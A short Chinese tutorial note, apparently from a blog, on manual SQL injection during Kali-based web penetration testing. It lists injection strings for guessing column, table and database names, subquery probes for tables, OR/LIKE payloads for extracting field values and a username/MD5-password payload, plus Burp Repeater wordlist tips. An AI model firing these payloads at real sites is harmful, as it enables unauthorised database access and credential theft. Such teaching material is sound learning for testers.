【Kali Web渗透测试】手动漏洞挖掘—SQL注入 猜测数据库列名、表名、库名、字段内容

1. 列名、表名、库名

' and user is null--+

' and table.user is null--+

' and db.table.user is null--+

用burp截获http GET请求,发送到repeater,变量加$, load字典(字典可从kali中获取(find / -name *column*.txt))

' and (select count(*) from table)>0--+    //猜数据库里其它的表

2. 字段内容

' or user = 'admin+   //user字段,user是通过猜列名得到的正确结果

' or user like '%a%   //构造SQL模糊查询语句

3. 猜账号对应密码

' or user='admin' and password='MD5值


你可能感兴趣的:(SQL注入)